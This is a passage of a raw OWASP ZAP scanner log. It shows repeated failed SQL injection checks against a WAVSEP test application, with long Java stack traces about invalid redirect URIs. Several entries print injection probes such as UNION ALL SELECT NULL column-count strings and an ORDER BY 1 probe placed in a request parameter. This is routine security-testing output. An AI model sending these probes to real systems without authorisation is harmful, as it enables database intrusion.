org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680830 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680831 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680832 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680832 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680834 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680834 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680834 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680835 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680836 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680836 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680837 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680837 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' ORDER BY 1-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' ORDER BY 1-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9680838 [ZAP-ActiveScanner-1] WARN 